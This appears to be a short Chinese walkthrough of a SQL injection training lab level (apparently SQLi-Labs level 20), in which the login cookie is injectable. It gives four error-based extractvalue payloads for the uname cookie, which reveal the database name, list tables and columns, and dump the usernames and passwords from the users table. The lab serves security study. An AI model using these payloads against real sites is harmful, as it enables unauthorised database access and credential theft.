目录
说明
20关在传入参数时会生成cookie,对生成的cookie可以实行注入。
提交参数的第一个数据包
第二个数据包
一、对第二个数据包的cookie实行注入
Cookie: uname=uname=admin' and extractvalue(1,concat(0x7e,(database()),0x7e)) #
二、查表
Cookie: uname=uname=admin' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e)) #
三、查列
Cookie: uname=uname=admin' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x7e)) #
四、查数据
Cookie: uname=uname=admin' and extractvalue(1,concat(0x7e,(select group_CONCAT(username,password) from users ),0x7e)) #